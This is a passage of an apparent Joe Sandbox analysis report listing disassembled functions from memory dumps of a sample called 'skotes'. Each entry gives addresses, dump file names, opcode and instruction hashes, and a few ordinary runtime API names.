                                                  • Opcode Fuzzy Hash: 1934eaa9b604135fb573749e9bba6156e948bda675fe0c316d9445e1f307d16d
                                                  • Instruction Fuzzy Hash: 3521B673F20539477B0CC47E8C5227DB6E1C78C541745823AE8A6EA2C1D968D917E2E4
                                                  Function 00DA779B Relevance: .1, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e146e7752a1a5fba466e7692bc14d52d09031b38eac2f8f99c736f5b3a521545
                                                  • Instruction ID: f9975cf7a799c7bbb08f6934f2bbbf4ac486e6171485de21ca499c60af57a254
                                                  • Opcode Fuzzy Hash: e146e7752a1a5fba466e7692bc14d52d09031b38eac2f8f99c736f5b3a521545
                                                  • Instruction Fuzzy Hash: DA118A33F30C255B675C817D8C1727A95D2DBD825071F533AD826E7384E994DE13D2A0
                                                  Function 00DA8860 Relevance: .1, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction ID: 06dd0d8cd24e211fa796af6a337df61c20332efb0f199023be0acbf952db2348
                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction Fuzzy Hash: ED115B7720118243E604863DF8B85BBE795EBC73217AD437AC8814B748CE2ADC41B620
                                                  Function 00D9652B Relevance: .0, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c496421388cec9da07444deacb704b0585d776b57ca0de86e1558d874ce58834
                                                  • Instruction ID: ea8b4f2bf39dcbd49747984689da68346d56df998bf363c4e785f8fa9e85aee4
                                                  • Opcode Fuzzy Hash: c496421388cec9da07444deacb704b0585d776b57ca0de86e1558d874ce58834
                                                  • Instruction Fuzzy Hash: DFE0C231001148AFCFA9BB99CC4DE5D3B2AFF01B41F450800FE0886222CB39ED81C7A0
                                                  Function 00D9A302 Relevance: .0, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                  • Instruction ID: ef730016691e79b1537d5fc1d1888c964a115cc7822795fbe007259a05d8dc7e
                                                  • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                  • Instruction Fuzzy Hash: ABE08C32921228EBCB14EFDCD90499AF3ECEB49B10B650096F901D3150C270DE00C7E0
                                                  Function 00D62EC0 Relevance: 7.8, APIs: 5, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Mtx_unlock$Cnd_broadcast
                                                  • String ID:
                                                  • API String ID: 32384418-0
                                                  • Opcode ID: 120ec380e1901edf9c43373c1396d825634afbae8c5a5abaa1b63a50b0a59d05
                                                  • Instruction ID: c03e3362424558753db1b3492f718260751c8db919c1fdb913ff9d2700481745
                                                  • Opcode Fuzzy Hash: 120ec380e1901edf9c43373c1396d825634afbae8c5a5abaa1b63a50b0a59d05
                                                  • Instruction Fuzzy Hash: E6A1C1B0A017059FDB20DF64C945B6AB7B8FF15314F188129E81AD7691FB35EA08CBB1
                                                  Function 00D9CBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _strrchr
                                                  • String ID:
                                                  • API String ID: 3213747228-0
                                                  • Opcode ID: 254d999fa369d06fd7d93151cbf4a8417e2da6d6341328512c40b930a69fa730
                                                  • Instruction ID: 444d82082ea2503661b1ed52a5448b01db6e74fd2e3d18b62d1adce693f1c4d7
                                                  • Opcode Fuzzy Hash: 254d999fa369d06fd7d93151cbf4a8417e2da6d6341328512c40b930a69fa730
                                                  • Instruction Fuzzy Hash: 74B10332E246459FDF25CF28C881BAEBFE5EF45340F18916AE855EB242D6349D41CB70
                                                  Function 00D7BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Xtime_diff_to_millis2_xtime_get
                                                  • String ID:
                                                  • API String ID: 531285432-0
                                                  • Opcode ID: 0e689964c9e6285ff400b608967780fc3dee30c8eb716f8b45005cb9cc5f5874
                                                  • Instruction ID: a47c6ff874f9ac8000b9ab7a0e2037555ae8543d3b4a5f8cdfa743337108be1b
                                                  • Opcode Fuzzy Hash: 0e689964c9e6285ff400b608967780fc3dee30c8eb716f8b45005cb9cc5f5874
                                                  • Instruction Fuzzy Hash: 64213571911219AFDF01EFA4DC829BEB7B9EF08710F50901AF905B7261EB309D419BB0